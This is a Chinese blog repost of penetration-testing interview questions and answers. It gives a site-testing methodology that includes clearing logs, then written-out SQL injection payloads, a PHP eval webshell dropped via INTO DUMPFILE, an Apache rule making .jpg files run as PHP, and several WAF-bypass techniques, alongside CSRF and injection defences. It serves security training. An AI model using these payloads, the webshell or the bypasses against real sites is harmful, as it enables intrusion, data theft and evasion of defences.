1. 程式人生 > >給你一個網站你是如何來滲透測試的?

給你一個網站你是如何來滲透測試的?

昨天分享了一套滲透工程師面試題,我冰雪表哥的回覆真的亮瞎了我的雙眼。我覺得我有必要收藏並且再分享一下。

在獲取書面授權的前提下。
1)資訊收集,
1,獲取域名的whois資訊,獲取註冊者郵箱姓名電話等。
2,查詢伺服器旁站以及子域名站點,因為主站一般比較難,所以先看看旁站有沒有通用性的cms或者其他漏洞。
3,檢視伺服器作業系統版本,web中介軟體,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞
4,檢視IP,進行IP地址埠掃描,對響應的埠進行漏洞探測,比如 rsync,心臟出血,mysql,ftp,ssh弱口令等。
5,掃描網站目錄結構,看看是否可以遍歷目錄,或者敏感檔案洩漏,比如php探針
6,google hack 進一步探測網站的資訊,後臺,敏感檔案

2)漏洞掃描
開始檢測漏洞,如XSS,XSRF,sql注入,程式碼執行,命令執行,越權訪問,目錄讀取,任意檔案讀取,下載,檔案包含,
遠端命令執行,弱口令,上傳,編輯器漏洞,暴力破解等
3)漏洞利用
利用以上的方式拿到webshell,或者其他許可權
4)許可權提升
提權伺服器,比如windows下mysql的udf提權,serv-u提權,windows低版本的漏洞,如iis6,pr,巴西烤肉,
linux藏牛漏洞,linux核心版本漏洞提權,linux下的mysql system提權以及oracle低許可權提權
5) 日誌清理
6)總結報告及修復方案

sqlmap,怎麼對一個注入點注入?
1)如果是get型號,直接,sqlmap -u “諸如點網址”.
2) 如果是post型諸如點,可以sqlmap -u “注入點網址” –data=”post的引數”
3)如果是cookie,X-Forwarded-For等,可以訪問的時候,用burpsuite抓包,注入處用*號替換,放到檔案裡,然後sqlmap -r “檔案地址”

nmap,掃描的幾種方式

sql注入的幾種型別?
1)報錯注入
2)bool型注入
3)延時注入
4)寬位元組注入

報錯注入的函式有哪些?

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------
2)通過floor報錯 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select * from test where id=1 and geometrycollection((select
* from(select * from(select user())a)b));
5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); 6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b)); 7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); 9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); 10).exp()select * from test where id=1 and exp(~(select * from(select user())a)); 延時注入如何來判斷? if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

盲注和延時注入的共同點?
都是一個字元一個字元的判斷

如何拿一個網站的webshell?
上傳,後臺編輯模板,sql注入寫檔案,命令執行,程式碼執行,
一些已經爆出的cms漏洞,比如dedecms後臺可以直接建立指令碼檔案,wordpress上傳外掛包含指令碼檔案zip壓縮包等

sql注入寫檔案都有哪些函式?

select '一句話' into outfile '路徑'
select '一句話' into dumpfile '路徑'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\\wwwroot\http://baidu.com\nvhack.php';

如何防止CSRF?
1,驗證referer
2,驗證token
詳細:淺談cnode社群如何防止csrf攻擊 - CNode技術社群

owasp 漏洞都有哪些?
1、SQL注入防護方法:
2、失效的身份認證和會話管理
3、跨站指令碼攻擊XSS
4、直接引用不安全的物件
5、安全配置錯誤
6、敏感資訊洩露
7、缺少功能級的訪問控制
8、跨站請求偽造CSRF
9、使用含有已知漏洞的元件
10、未驗證的重定向和轉發

SQL注入防護方法?
1、使用安全的API
2、對輸入的特殊字元進行Escape轉義處理
3、使用白名單來規範化輸入驗證方法
4、對客戶端輸入進行控制,不允許輸入SQL注入相關的特殊字元
5、伺服器端在提交資料庫進行SQL查詢之前,對特殊字元進行過濾、轉義、替換、刪除。

程式碼執行,檔案讀取,命令執行的函式都有哪些?
1,程式碼執行:eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
2,檔案讀取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
3,命令執行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()
img標籤除了onerror屬性外,還有其他獲取管理員路徑的辦法嗎?
src指定一個遠端的指令碼檔案,獲取referer
img標籤除了onerror屬性外,並且src屬性的字尾名,必須以.jpg結尾,怎麼獲取管理員路徑。
1,遠端伺服器修改apache配置檔案,配置.jpg檔案以php方式來解析
AddType application/x-httpd-php .jpg

http://xss.tv/1.jpg>

會以php方式來解析

程式碼審計
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

檔案讀取:file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

繞過walf

1、關鍵字可以用%(只限IIS系列)。比如select,可以sel%e%ct。原理:網路層waf對SEL%E%CT進行url解碼後變成SEL%E%CT,匹配select失敗,而進入asp.dll對SEL%E%CT進行url解碼卻變成select。IIS下的asp.dll檔案在對asp檔案後引數串進行url解碼時,會直接過濾掉09-0d(09是tab鍵,0d是回車)、20(空格)、%(後兩個字元有一個不是十六進位制)字元。xss也是同理。

2、通殺的,內聯註釋。安全狗不攔截,但是安全寶、加速樂、D盾等,看到/!/就Fack了,所以只限於安全狗。比如:/!select*/

3、編碼。這個方法對waf很有效果,因為一般waf會解碼,但是我們利用這個特點,進行兩次編碼,他解了第一次但不會解第二次,就bypass了。騰訊waf、百度waf等等都可以這樣bypass的。

4,繞過策略一:偽造搜尋引擎

早些版本的安全狗是有這個漏洞的,就是把User-Agent修改為搜尋引擎

5,360webscan指令碼存在這個問題,就是判斷是否為admin dede install等目錄,如果是則不做攔截

  1. GET /pen/news.php?id=1 union select user,password from mysql.user

  2. GET /pen/news.php/admin?id=1 union select user,password from mysql.user

  3. GET /pen/admin/..\news.php?id=1 union select user,password from mysql.user

6,multipart請求繞過,在POST請求中新增一個上傳檔案,繞過了絕大多數WAF。

7,引數繞過,複製引數,id=1&id=1

用一些特殊字元代替空格,比如在mysql中%0a是換行,可以代替空格,這個方法也可以部分繞過最新版本的安全狗,在sqlserver中可以用/**/代替空格

8,內聯註釋,

檔案上傳,複製檔案包一份再加一份

在 form-data;後面增加一定的字元
寬字元注入

寬字元:解 決方法:就是在初始化連線和字符集之後,使用SET character_set_client=binary來設定客戶端的字符集是二進位制的。修改Windows下的MySQL配置檔案一般是 my.ini,Linux下的MySQL配置檔案一般是my.cnf,比如:mysql_query(“SETcharacter_set_client=binary”);。character_set_client指定的是SQL語句的編碼,如果設定為 binary,MySQL就以二進位制來執行,這樣寬位元組編碼問題就沒有用武之地了。
網路滲透Web 安全測試黑客 (Hacker)